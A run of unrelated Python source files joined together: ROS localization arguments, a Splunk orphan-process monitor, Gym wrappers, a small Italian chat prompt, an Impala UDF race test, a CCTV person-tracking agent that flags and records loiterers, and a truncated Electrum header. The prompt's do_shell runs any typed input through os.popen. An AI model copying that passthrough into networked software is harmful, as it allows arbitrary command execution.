parser.add_argument("-ugl", "--use-gt-likelihood", help="PM = ground truth likelihood", action="store_true") parser.add_argument("--mask", action="store_true", help='mask likelihood with obstacle info') parser.add_argument("-ch3","--ch3", choices=['NONE','RAND','ZERO'], type=str, default='NONE') parser.add_argument("--n-pre-classes", "-npc", type=int, default=None) parser.add_argument("--schedule-pm", action="store_true") parser.add_argument("--schedule-rl", action="store_true") parser.add_argument("--pm-step-size", type=int, default=250) parser.add_argument("--rl-step-size", type=int, default=250) parser.add_argument("--pm-decay", type=float, default=0.1) parser.add_argument("--rl-decay", type=float, default=0.1) parser.add_argument("--drop-rate", type=float, default=0.0) ## LM-PARAMS parser.add_argument('-lp', '--lrpm', help="lr for PM (1e-5)", type=float, default=1e-5) parser.add_argument('-upm', '--update-pm-by', help="train PM with GTL,RL,both, none", choices = ['GTL','RL','BOTH','NONE'], default='NONE', type=str) ## LOGGING parser.add_argument('-ln', "--tflogs-name", help="experiment name to append to the tensor board log files", type=str, default=None) parser.add_argument('-tf', '--tflog', dest="tflog",help="tensor board log True/False", action="store_true") parser.add_argument('-ntf', '--no-tflog', dest="tflog",help="tensor board log True/False", action="store_false") parser.set_defaults(tflog=False) parser.add_argument('--save', help="save logs and models", action="store_true", dest='save') parser.add_argument('--no-save', help="don't save any logs or models", action="store_false", dest='save') parser.set_defaults(save=True) parser.add_argument('-pro', '--prob-roll-out', help="sample probability for roll out (0.01)", type=float, default=0.00) parser.add_argument('--mdl-save-freq', type=int, default=1) ## LOADING MODELS/DATA parser.add_argument('--pm-model', help="perceptual model path and file", type=str, default=None) parser.add_argument('--use-pretrained', action='store_true') parser.add_argument('--rl-model', help="RL model path and file", type=str, default=None) parser.add_argument('--ir-model', help="intrinsic reward model path and file", type=str, default=None) parser.add_argument('--test-mode', action="store_true") parser.add_argument('--test-data-path', type=str, default='') parser.add_argument('--ports', type=str, default='') args = parser.parse_args() # if args.suppress_fig: # import matplotlib as mpl # mpl.use('Agg') if 360%args.pm_scan_step !=0 or args.pm_scan_step <=0 or args.pm_scan_step > 360: raise Exception('pm-scan-step should be in [1, 360]') if args.pm_model is not None: if os.path.islink(args.pm_model): args.pm_model = os.path.realpath(args.pm_model) if args.rl_model is not None: if os.path.islink(args.rl_model): args.rl_model = os.path.realpath(args.rl_model) print (args) if len(args.set_gpu)>0: os.environ["CUDA_VISIBLE_DEVICES"]=','.join(str(x) for x in args.set_gpu) # while(1): localizer.loop() if args.jay1 or args.gazebo: rospy.init_node('DAL', anonymous=False) localizer = LocalizationNode(args) rospy.on_shutdown(localizer.onShutdown) rospy.spin() else: localizer = LocalizationNode(args) while(1): localizer.loop()
orphan_process_monitor.py
# Copyright 2016 Splunk, Inc. # # Licensed under the Apache License, Version 2.0 (the 'License'): you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. ''' Orphan process monitor. ''' import os import threading import time __all__ = ['OrphanProcessChecker', 'OrphanProcessMonitor'] class OrphanProcessChecker(object): '''Orphan process checker. Only work for Linux platform. On Windows platform, is_orphan is always False and there is no need to do this monitoring on Windows. :param callback: (optional) Callback for orphan process. :type callback: ``function`` ''' def __init__(self, callback=None): if os.name == 'nt': self._ppid = 0 else: self._ppid = os.getppid() self._callback = callback def is_orphan(self): '''Check process is orphan. For windows platform just return False. :returns: True for orphan process else False :rtype: ``bool`` ''' if os.name == 'nt': return False return self._ppid != os.getppid() def check_orphan(self): '''Check if the process becomes orphan. If the process becomes orphan then call callback function to handle properly. :returns: True for orphan process else False :rtype: ``bool`` ''' res = self.is_orphan() if res and self._callback: self._callback() return res class OrphanProcessMonitor(object): '''Orpan process monitor. Check if process become orphan in background thread per iterval and call callback if process become orphan. :param callback: Callback for orphan process monitor. :type callback: ``function`` :param interval: (optional) Interval to monitor. :type interval: ``integer`` ''' def __init__(self, callback, interval=1): self._checker = OrphanProcessChecker(callback) self._thr = threading.Thread(target=self._do_monitor) self._thr.daemon = True self._started = False self._interval = interval def start(self): ''' Start orphan process monitor. ''' if self._started: return self._started = True self._thr.start() def stop(self): ''' Stop orphan process monitor. ''' joinable = self._started self._started = False if joinable: self._thr.join(timeout=1) def _do_monitor(self): while self._started: if self._checker.check_orphan(): break for _ in range(self._interval): if not self._started: break time.sleep(1)
wrappers.py
# coding=utf-8 # Copyright 2020 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Wrappers for OpenAI Gym environments.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import atexit import functools import multiprocessing import sys import traceback import gym import gym.spaces import numpy as np import tensorflow.compat.v1 as tf class AttributeModifier(object): """Provides getter and setter functions to access wrapped environments.""" def __getattr__(self, name): return getattr(self._env, name) def set_attribute(self, name, value): """Set an attribute in the wrapped environment. Args: name: Attribute to access. value: New attribute value. """ set_attr = getattr(self._env, 'set_attribute', None) if callable(set_attr): self._env.set_attribute(name, value) else: setattr(self._env, name, value) class RangeNormalize(AttributeModifier): """Normalize the specialized observation and action ranges to [-1, 1].""" def __init__(self, env): self._env = env self._should_normalize_observ = self._is_finite(self._env.observation_space) if not self._should_normalize_observ: tf.logging.info('Not normalizing infinite observation range.') self._should_normalize_action = self._is_finite(self._env.action_space) if not self._should_normalize_action: tf.logging.info('Not normalizing infinite action range.') @property def observation_space(self): space = self._env.observation_space if not self._should_normalize_observ: return space return gym.spaces.Box( -np.ones(space.shape), np.ones(space.shape), dtype=np.float32) @property def action_space(self): space = self._env.action_space if not self._should_normalize_action: return space return gym.spaces.Box( -np.ones(space.shape), np.ones(space.shape), dtype=np.float32) def step(self, action): if self._should_normalize_action: action = self._denormalize_action(action) observ, reward, done, info = self._env.step(action) if self._should_normalize_observ: observ = self._normalize_observ(observ) return observ, reward, done, info def reset(self): observ = self._env.reset() if self._should_normalize_observ: observ = self._normalize_observ(observ) return observ def _denormalize_action(self, action): min_ = self._env.action_space.low max_ = self._env.action_space.high action = (action + 1) / 2 * (max_ - min_) + min_ return action def _normalize_observ(self, observ): min_ = self._env.observation_space.low max_ = self._env.observation_space.high observ = 2 * (observ - min_) / (max_ - min_) - 1 return observ def _is_finite(self, space): return np.isfinite(space.low).all() and np.isfinite(space.high).all() class ClipAction(AttributeModifier): """Clip out of range actions to the action space of the environment.""" def __init__(self, env): self._env = env @property def action_space(self): shape = self._env.action_space.shape return gym.spaces.Box( -np.inf * np.ones(shape), np.inf * np.ones(shape), dtype=np.float32) def step(self, action): action_space = self._env.action_space action = np.clip(action, action_space.low, action_space.high) return self._env.step(action) class LimitDuration(AttributeModifier): """End episodes after specified number of steps.""" def __init__(self, env, duration): self._env = env self._duration = duration self._step = None def step(self, action): if self._step is None: raise RuntimeError('Must reset environment.') observ, reward, done, info = self._env.step(action) self._step += 1 if self._step >= self._duration: done = True self._step = None return observ, reward, done, info def reset(self): self._step = 0 return self._env.reset() class ExternalProcess(object): """Step environment in a separate process for lock free paralellism.""" # Message types for communication via the pipe. _ACTION = 1 _RESET = 2 _CLOSE = 3 _GETATTRIBUTE = 4 _SETATTRIBUTE = 5 _TRANSITION = 6 _OBSERV = 7 _EXCEPTION = 8 _VALUE = 9 def __init__(self, constructor): """Step environment in a separate process for lock free paralellism. The environment will be created in the external process by calling the specified callable. This can be an environment class, or a function creating the environment and potentially wrapping it. The returned environment should not access global variables. Args: constructor: Callable that creates and returns an OpenAI gym environment. Attributes: observation_space: The cached observation space of the environment. action_space: The cached action space of the environment. """ self._conn, conn = multiprocessing.Pipe() self._process = multiprocessing.Process( target=self._worker, args=(constructor, conn)) atexit.register(self.close) self._process.start() self._observ_space = None self._action_space = None @property def observation_space(self): if not self._observ_space: self._observ_space = self.__getattr__('observation_space') return self._observ_space @property def action_space(self): if not self._action_space: self._action_space = self.__getattr__('action_space') return self._action_space def __getattr__(self, name): """Request an attribute from the environment. Note that this involves communication with the external process, so it can be slow. Args: name: Attribute to access. Returns: Value of the attribute. """ self._conn.send((self._GETATTRIBUTE, name)) return self._receive(self._VALUE) def set_attribute(self, name, value): """Set an attribute in the environment. Note that this involves communication with the external process, so it can be slow. Args: name: Attribute to access. value: New attribute value. """ self._conn.send((self._SETATTRIBUTE, (name, value))) def step(self, action, blocking=True): """Step the environment. Args: action: The action to apply to the environment. blocking: Whether to wait for the result. Returns: Transition tuple when blocking, otherwise callable that returns the transition tuple. """ self._conn.send((self._ACTION, action)) if blocking: return self._receive(self._TRANSITION) else: return functools.partial(self._receive, self._TRANSITION) def reset(self, blocking=True): """Reset the environment. Args: blocking: Whether to wait for the result. Returns: New observation when blocking, otherwise callable that returns the new observation. """ self._conn.send((self._RESET, None)) if blocking: return self._receive(self._OBSERV) else: return functools.partial(self._receive, self._OBSERV) def close(self): """Send a close message to the external process and join it.""" if self._process: try: self._conn.send((self._CLOSE, None)) self._conn.close() except IOError: # The connection was already closed. pass self._process.join() # Python leaks file descriptors without the line below del self._process del self._conn self._conn = None self._process = None else: pass # Don't close a connection twice def _receive(self, expected_message): """Wait for a message from the worker process and return its payload. Args: expected_message: Type of the expected message. Raises: Exception: An exception was raised inside the worker process. KeyError: The reveived message is not of the expected type. Returns: Payload object of the message. """ message, payload = self._conn.recv() # Re-raise exceptions in the main process. if message == self._EXCEPTION: stacktrace = payload raise Exception(stacktrace) if message == expected_message: return payload raise KeyError('Received message of unexpected type {}'.format(message)) def _worker(self, constructor, conn): """The process waits for actions and sends back environment results. Args: constructor: Constructor for the OpenAI Gym environment. conn: Connection for communication to the main process. """ try: env = constructor() while True: try: # Only block for short times to have keyboard exceptions be raised. if not conn.poll(0.1): continue message, payload = conn.recv() except (EOFError, KeyboardInterrupt): break if message == self._ACTION: action = payload conn.send((self._TRANSITION, env.step(action))) continue if message == self._RESET: assert payload is None conn.send((self._OBSERV, env.reset())) continue if message == self._GETATTRIBUTE: name = payload conn.send((self._VALUE, getattr(env, name))) continue if message == self._SETATTRIBUTE: name, value = payload set_attr = getattr(env, 'set_attribute', None) if callable(set_attr): env.set_attribute(name, value) else: setattr(env, name, value) continue if message == self._CLOSE: assert payload is None if hasattr(env, 'close'): env.close() break raise KeyError('Received message of unknown type {}'.format(message)) except Exception: # pylint: disable=broad-except stacktrace = ''.join(traceback.format_exception(*sys.exc_info())) # pylint: disable=no-value-for-parameter conn.send((self._EXCEPTION, stacktrace)) tf.logging.error('Error in environment process: {}'.format(stacktrace)) conn.close()
my_shell.py
from cmd import Cmd from threading import Thread import time import os import re class RingPrompt(Cmd): prompt = '' intro = 'Benvenuto nel ring. Usa ? per accedere all\'help' def do_exit(self, inp): print('Ciao, alla prossima!') return True def do_send(self, inp): #Prototipo messaggio: [id] <MESSAGGIO> result = re.search('^\[([0-9]*)\]', inp) if bool(result): id_ = result.group(1) result = re.search('<([a-zA-Z0-9\,\.\;\'\"\!\?<> ]*)>', inp) if bool(result): mess = result.group(1) print('Destinatario: {}\nMessaggio: {}'.format(id_, mess)) def echo_message(self, inp): print('Messaggio Ricevuto: {}'.format(inp)) #def do_help(self, inp): # print("Help non ancora implementato") def do_shell(self, inp): print(os.popen(inp).read()) def managePrompt(prompt): prompt.cmdloop() if __name__ == '__main__': prompt = RingPrompt() Thread(target=managePrompt, args=(prompt,)).start()
test_udf_concurrency.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os import pytest import random import threading import time from subprocess import check_call from tests.common.custom_cluster_test_suite import CustomClusterTestSuite from tests.common.impala_cluster import ImpalaCluster from tests.util.filesystem_utils import get_fs_path # This custom cluster test splits out concurrency tests to allow running with # a higher fe_service_threads (and thus higher concurrency). This also avoids # side-effects for other tests (see IMPALA-7639). class TestUdfConcurrency(CustomClusterTestSuite): @classmethod def get_workload(self): return 'functional-query' @classmethod def add_test_dimensions(cls): super(TestUdfConcurrency, cls).add_test_dimensions() @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(impalad_args="--fe_service_threads=1000") def test_native_functions_race(self, vector, unique_database): """ IMPALA-6488: stress concurrent adds, uses, and deletes of native functions. Exposes a crash caused by use-after-free in lib-cache.""" # Native function used by a query. Stresses lib-cache during analysis and # backend expressions. create_fn_to_use = \ """create function {0}.use_it(string) returns string LOCATION '{1}' SYMBOL='_Z8IdentityPN10impala_udf15FunctionContextERKNS_9StringValE'""" use_fn = """select * from (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) = 'blah' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(String_col) > '1' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) > '1'))) v""" # Reference to another native function from the same 'so' file. Creating/dropping # stresses lib-cache lookup, add, and refresh. create_another_fn = """create function if not exists {0}.other(float) returns float location '{1}' symbol='Identity'""" drop_another_fn = """drop function if exists {0}.other(float)""" udf_path = get_fs_path('/test-warehouse/libTestUdfs.so') # Tracks number of impalads prior to tests to check that none have crashed. # All impalads are assumed to be coordinators. cluster = ImpalaCluster() exp_num_coordinators = cluster.num_responsive_coordinators() setup_client = self.create_impala_client() setup_query = create_fn_to_use.format(unique_database, udf_path) try: setup_client.execute(setup_query) except Exception as e: print "Unable to create initial function: {0}".format(setup_query) raise errors = [] def use_fn_method(): time.sleep(1 + random.random()) client = self.create_impala_client() query = use_fn.format(unique_database) try: client.execute(query) except Exception as e: errors.append(e) def load_fn_method(): time.sleep(1 + random.random()) client = self.create_impala_client() drop = drop_another_fn.format(unique_database) create = create_another_fn.format(unique_database, udf_path) try: client.execute(drop) client.execute(create) except Exception as e: errors.append(e) # number of uses/loads needed to reliably reproduce the bug. num_uses = 200 num_loads = 200 # create threads to use native function. runner_threads = [] for i in xrange(num_uses): runner_threads.append(threading.Thread(target=use_fn_method)) # create threads to drop/create native functions. for i in xrange(num_loads): runner_threads.append(threading.Thread(target=load_fn_method)) # launch all runner threads. for t in runner_threads: t.start() # join all threads. for t in runner_threads: t.join() for e in errors: print e # Checks that no impalad has crashed. assert cluster.num_responsive_coordinators() == exp_num_coordinators @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(impalad_args="--fe_service_threads=1000") def test_concurrent_jar_drop_use(self, vector, unique_database): """IMPALA-6215: race between dropping/using java udf's defined in the same jar. This test runs concurrent drop/use threads that result in class not found exceptions when the race is present. """ udf_src_path = os.path.join( os.environ['IMPALA_HOME'], "testdata/udfs/impala-hive-udfs.jar") udf_tgt_path = get_fs_path( '/test-warehouse/{0}.db/impala-hive-udfs.jar'.format(unique_database)) create_fn_to_drop = """create function {0}.foo_{1}() returns string LOCATION '{2}' SYMBOL='org.apache.impala.TestUpdateUdf'""" create_fn_to_use = """create function {0}.use_it(string) returns string LOCATION '{1}' SYMBOL='org.apache.impala.TestUdf'""" drop_fn = "drop function if exists {0}.foo_{1}()" use_fn = """select * from (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) = 'blah' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(String_col) > '1' union all (select max(int_col) from functional.alltypesagg where {0}.use_it(string_col) > '1'))) v""" num_drops = 100 num_uses = 100 # use a unique jar for this test to avoid interactions with other tests # that use the same jar check_call(["hadoop", "fs", "-put", "-f", udf_src_path, udf_tgt_path]) # create all the functions. setup_client = self.create_impala_client() try: s = create_fn_to_use.format(unique_database, udf_tgt_path) setup_client.execute(s) except Exception as e: print e assert False for i in range(0, num_drops): try: setup_client.execute(create_fn_to_drop.format(unique_database, i, udf_tgt_path)) except Exception as e: print e assert False errors = [] def use_fn_method(): time.sleep(5 + random.random()) client = self.create_impala_client() try: client.execute(use_fn.format(unique_database)) except Exception as e: errors.append(e) def drop_fn_method(i): time.sleep(1 + random.random()) client = self.create_impala_client() try: client.execute(drop_fn.format(unique_database, i)) except Exception as e: errors.append(e) # create threads to use functions. runner_threads = [] for i in range(0, num_uses): runner_threads.append(threading.Thread(target=use_fn_method)) # create threads to drop functions. for i in range(0, num_drops): runner_threads.append(threading.Thread(target=drop_fn_method, args=(i, ))) # launch all runner threads. for t in runner_threads: t.start() # join all threads. for t in runner_threads: t.join() # Check for any errors. for e in errors: print e assert len(errors) == 0
person.py
from .agent import * from .agent import _crop, _nd2file from .kcftracker import KCFTracker from .record import Record from .worker import Consumer from utils.action import cut, frames2data from time import time from datetime import datetime PAR = True DEBUG = False SIMILARITY_THRESHOLD = .85 DISTANCE_THRESHOLD = 200 FEATURE_MOMENTUM = .9 IMAGE_LIST_SIZE = 10 MIN_OVERSTAY = 120 def make_object_type(): class Person: current_id = 0 def __init__(self, feature, box): cls = type(self) self.id = str(cls.current_id) self.feature = feature self.box = box self.first_seen = self.last_seen = time() self.last_save = 0 self.imgs = [] # video clips of action recognition for each person id cls.current_id += 1 # def add_img(self, frame): # self.imgs.append(cut(frame, self.box)) # if len(self.imgs) > IMAGE_LIST_SIZE: # self.imgs.pop(0) def __str__(self): return self.id @staticmethod def is_overstay(seconds): return seconds > MIN_OVERSTAY @staticmethod def is_alike(similarity): return similarity > SIMILARITY_THRESHOLD @staticmethod def is_far(delta): return delta > DISTANCE_THRESHOLD return Person def make_track_type(): from .async_kcftracker import update class _Track(Track): ALL = set() current_id = 0 health = 5 CANDIDATE_IOU = .5 def step1(self, frame): coro = update(self.tracker, frame) try: coro.send(None) except StopIteration as e: new_box = e.value # new_box = self.tracker.update(frame) new_box = np.array(new_box) ds = new_box - self.box ds_ = ds if self.velocity is None else self.velocity self.velocity = ds * Track.momentum_ + ds_ * Track.momentum self.box = new_box H, W = frame.shape[:2] l, t, h, w = self.box if 0 < (l+w/2) < W and 0 < (t+h/2) < H: pass else: self.visible = False return _Track # return _Track class Storage: def __init__(self, object_type, memory=15): self.id_map = {} self.memory = memory self.object_type = object_type def add(self, feature, box): p = self.object_type(feature, box) self.id_map[p.id] = p def reg(self, feature, box): feature = np.array(feature, np.float32) if len(self.id_map): q = self.query(feature) p = self.id_map[q['id']] if self.object_type.is_far(abs(box - p.box).sum()): # diff # print('new', abs(box - p.box).sum()) self.add(feature, box) elif self.object_type.is_alike(q['similarity']): # same p.feature = p.feature * FEATURE_MOMENTUM + feature * (1-FEATURE_MOMENTUM) p.box = p.box * FEATURE_MOMENTUM + box * (1-FEATURE_MOMENTUM) else: # occlusion pass # ignore else: self.add(feature, box) def query(self, feature): assert len(self.id_map), 'no id in storage, register first!' similarity_lst = [] id_lst = [] for v in self.id_map.values(): similarity_lst += [self.compare(v.feature, feature)] id_lst += [v] idx = np.argmax(similarity_lst) id = id_lst[idx] sim = similarity_lst[idx] return {'id': str(id), 'similarity': similarity_lst[idx]} def forget(self): now = time() delete_keys = [] for k in self.id_map: if now - self.id_map[k].last_seen > self.memory: delete_keys.append(k) for k in delete_keys: del self.id_map[k] @staticmethod def compare(feature1, feature2): f1 = np.array(feature1) f2 = np.array(feature2) cos = np.dot(f1, f2)/np.linalg.norm(f1)/np.linalg.norm(f2) return cos # return np.exp(cos - 1) class PersonAgent(Agent): def __init__(self, source, host='localhost'): super().__init__(source, host) self.current_date = datetime.now().date() # - timedelta(days=1) source_dir = source[source.find('@')+1:source.find('/cam')] source_dir = os.path.basename(source_dir) self.source_dir = source_dir self.output_dir = os.path.join('output', source_dir, str(self.current_date)) if not os.path.exists(self.output_dir): os.makedirs(self.output_dir) self.output_log = os.path.join(self.output_dir + '/log.txt') self.Track = make_track_type() self.api_calls = {k: 0 for k in ['register', 'detection', 'feature', 'query', 'refresh', 'attributes', # 'action', ]} PAR_URL = 'http://%s:6666/att' % host EXT_URL = 'http://%s:6666/fea' % host # ACT_URL = 'http://%s:6671/act' % host self.storage = Storage(make_object_type()) # self.bag_storage = BagStorage() def par(img_file, api_calls): api_calls['attributes'] += 1 # print(img_file) response = requests.post(PAR_URL, files={'img': img_file}) att = response.json() return att # return np.array(response.json()['predictions'], dtype=np.uint8) def ext(img_file, api_calls): api_calls['feature'] += 1 response = requests.post(EXT_URL, files={'img': img_file}) return response.json() def query(feature, api_calls): api_calls['query'] += 1 try: return self.storage.query(feature) except AssertionError: return {} #Function to put frame into Record object and push to queue def output(record, frame): record.add_frame(frame) return record, frame # def act(img_list, api_calls): # api_calls['action'] += 1 # a = frames2data(img_list) # response = requests.post(ACT_URL, pickle.dumps(a)) # return response.json()[0] self.w_par = Worker(lambda i, x: (i, par(_nd2file(x), self.api_calls)), debug=DEBUG) self.w_ext = Worker(lambda i, x: (i, ext(_nd2file(x), self.api_calls))) self.w_cmp = Worker(lambda i, x: (i, query(x, self.api_calls))) #Worker containing the Record objects of overstayed objects self.w_record = Worker(lambda x, i: (x, output(x, i))) self.w_tracking = Consumer(lambda x: self.Track.step(x), debug=DEBUG) # self.w_act = Worker(lambda i, x: (i, act(x, self.api_calls))) self.workers.extend([self.w_ext, self.w_cmp, self.w_par, self.w_record, self.w_tracking, ]) # memory self.reported = set() self.th = Thread(target=self.loop, daemon=True) self.th.start() def on_new_det(self, t:Track, img_roi): self.w_ext.put(t, img_roi) #Function to check current system date def check_date(self): if datetime.now().date() > self.current_date: print('Creating new directory for {}'.format(datetime.now().date())) #Update date and create new directory self.current_date = datetime.now().date() new_dir = os.path.join(os.path.join('output', str(self.source_dir)), str(self.current_date)) os.makedirs(new_dir) #Change output directory and output log file paths self.output_dir = new_dir self.output_log = new_dir + '/log.txt' def loop(self): track_list = None while self.running: #Check date every 600 frames if self.frame_count % 600 == 0: self.check_date() self.Track.ALL = set() ret, frame = self.cap.read() if not ret or frame is None: self.cap = cv2.VideoCapture(self.source) # print('renewed', self.source) continue # frame = cv2.resize(frame, (0, 0), fx=.5, fy=.5) # down-sampling frame_ = frame.copy() self.w_tracking.put(frame_) # self.Track.step(frame_) if self.frame_count % INTEVAL == 0: self.w_det.put(frame_) self.storage.forget() self.Track.decay() now = time() for t in self.Track.ALL: p = self.storage.id_map.get(t.id) if p is not None: seconds = now - p.first_seen t.stay = seconds t.par = getattr(p, 'attributes', []) # p.add_img(frame_) # type Person # if len(p.imgs) >= IMAGE_LIST_SIZE and self.frame_count % TIMEWALL == 0: # self.w_act.put(p.id, p.imgs[-IMAGE_LIST_SIZE:]) if getattr(p, 'not_register', True): self.w_par.put(p, _crop(frame_, t.box)) p.not_register = False if self.storage.object_type.is_overstay(seconds): t.overstay = True if p.id not in self.reported and hasattr(p, 'attributes'): self.reported.add(p.id) output_path = os.path.join(self.output_dir, '{}_{}_{}.%s'.format(p.id, '_'.join(p.attributes), datetime.now())) self.w_record.put(Record(output_path % 'avi'), frame_) p.example = self.crop(frame_, t.box) cv2.imwrite(output_path % 'jpg', p.example) p.color = t.color # logging = ' '.join(['[overstay] id:', p.id, # 'attr:', ' '.join(p.attributes), # 'loc:', self.source]) # print(logging) # print(logging, file=open(self.output_log, 'a')) p.last_seen = now self._post_det_procedure() self._post_ext_procedure() self._post_cmp_procedure(frame_) # self._post_act_procedure() self._post_par_procedure() if not self.control_queue.empty(): x, y = self.control_queue.get() H, W, _ = frame.shape self.click_handle(int(x * W), int(y * H)) self._render(frame) #Perform post output procedure self._post_output_procedure(frame) x_offset = 200 for p in list(self.storage.id_map.values()): if hasattr(p, 'example'): example = p.example h, w, _ = example.shape x_offset_ = x_offset + w frame[0:h, x_offset:x_offset_] = example cv2.rectangle(frame, (x_offset, 0), (x_offset_, h), p.color, 1) cv2.putText(frame, p.id, (x_offset, h//2), cv2.FONT_HERSHEY_SIMPLEX, 1.2, p.color, 2) y_offset = 20 for a in p.attributes: cv2.putText(frame, a, (x_offset, h + y_offset), cv2.FONT_HERSHEY_SIMPLEX, 0.8, p.color, 2) y_offset += 20 x_offset = x_offset_ # print(self.display_queue.qsize()) # print(self.w_cmp.p.qsize(), self.w_cmp.q.qsize()) self.display_queue.put(frame) # give RGB self.frame_count += 1 self._kill_workers() def _post_det_procedure(self): if self.w_det.has_feedback(): frame_, boxes = self.w_det.get() if len(boxes): boxes, labels = _cvt_ltrb2ltwh(boxes) # TODO: seperate person and bags into boxes1 and boxes2 # memory bags in boxes2 # for b in boxes2: # self.bag_storage.reg(b) del labels self.Track.update(frame_, boxes) for t in self.Track.ALL: # t.visible=True if t.visible: if isinstance(t.id, int): if t.age % REFRESH_INTEVAL == 0: if t.age // REFRESH_INTEVAL: self.api_calls['refresh'] += 1 img_roi = _crop(frame_, t.box) self.on_new_det(t, img_roi) else: for t in self.Track.ALL: t.visible = False t.health -= 1 if t.age > self.Track.PROBATION else 9999 def _post_ext_procedure(self): if not self.w_ext.p.empty(): t, feature = self.w_ext.get() t.feature = feature self.w_cmp.put(t, feature) self.storage.reg(feature, t.box) self.api_calls['register'] += 1 def _post_cmp_procedure(self, frame_): if not self.w_cmp.p.empty(): t, ret = self.w_cmp.get() i = ret.get('id') if i is not None: t.similarity = ret.get('similarity') if self.storage.object_type.is_alike(t.similarity): c = colors[hash(i or 0) % 256] t.color = c t.id = i def _post_par_procedure(self): if not self.w_par.p.empty(): p, att = self.w_par.get() # person attributes p.attributes = att #Function to perform post output procedure def _post_output_procedure(self, frame): if self.w_record.has_feedback(): current_record, _ = self.w_record.get() #If True, save video if current_record.check_save(): current_record.save_video() else: self.w_record.put(current_record, frame) # def _post_act_procedure(self): # if not self.w_act.p.empty(): # i, ret = self.w_act.get() # if i in self.storage.id_map: # self.storage.id_map[i].action = ','.join(ret) # take the first action # # self.storage.id_map[i].action = ret[0] # take the first action def _render(self, frame): if len(self.points): for p in self.points: cv2.drawMarker(frame, p, (255, 0, 255)) if self.contour is not None: frame_ = frame.copy() cv2.drawContours(frame_, [self.contour], 0, (0, 255, 0), thickness=-1) opacity = .7 cv2.addWeighted(frame_, 1 - opacity, frame, opacity, 0., frame) cv2.rectangle(frame, (0,0), (200, 175), (128,128,128), -1) cv2.putText(frame, 'Tracks:%d' % len(self.Track.ALL), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 0), 2) for i, kv in enumerate(self.api_calls.items()): cv2.putText(frame, '{:<10}'.format(kv[0]), (10, i*20 + 60), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 0), 1) cv2.putText(frame, '{:>6}'.format(kv[1]), (100, i*20 + 60), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 0), 1) # trk_lst = [] # for trk in cls.ALL: # if isinstance(trk.id, str): # trk_lst += [trk] # else: # trk._render(frame) # unmatched tracks # for trk in trk_lst: # if trk.visible: # trk._render(frame) # tracks with matched ids for t in self.Track.ALL: if t.visible and getattr(t, 'overstay', False) or DEBUG: t._render(frame) x, y, w, h = map(int, t.box) if hasattr(t, 'overstay'): t.text(frame, 'overstay', int(x), int(y + h + 20)) # type Track if hasattr(t, 'stay'): t.text(frame, '%d' % int(t.stay), x + 3, y + h - 3, .6, 2) p = self.storage.id_map.get(t.id) if p is not None and hasattr(p, 'action'): y += 20 cv2.putText(frame, p.action, (x + w + 3, y), cv2.FONT_HERSHEY_SIMPLEX, 1., t.color, 2) if hasattr(t, 'par'): # docker image: par2 for a in t.par: y += 16 cv2.putText(frame, a, (x + w + 3, y), cv2.FONT_HERSHEY_SIMPLEX, 0.6, t.color, 2) @staticmethod def crop(frame, trk_box): H, W, _ = frame.shape left, t, w, h = map(int, trk_box) left = max(left, 0) t = max(t, 0) r = min(left + w, W) b = min(t + h, H) crop = frame[t: b, left: r, :] return crop def _cvt_ltrb2ltwh(boxes, contour=None): boxes_ = [] labels = [] if contour is None: for b in boxes: labels.append(b['label']) b = b['box'] boxes_.append([b['left'], b['top'], b['right'], b['bottom']]) else: for b in boxes: l = b['labels'] b = b['box'] left = b['left'] top = b['top'] right = b['right'] bottom = b['bottom'] point = ((left+right)/2, bottom) if cv2.pointPolygonTest(contour, point, False) > 0: # -1:out, 1: in, 0:on labels.append(l) boxes_.append([left, top, right, bottom]) else: print('excluded', b) boxes = np.array(boxes_) boxes[:, 2: 4] -= boxes[:, :2] return boxes[:, :4], labels
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # 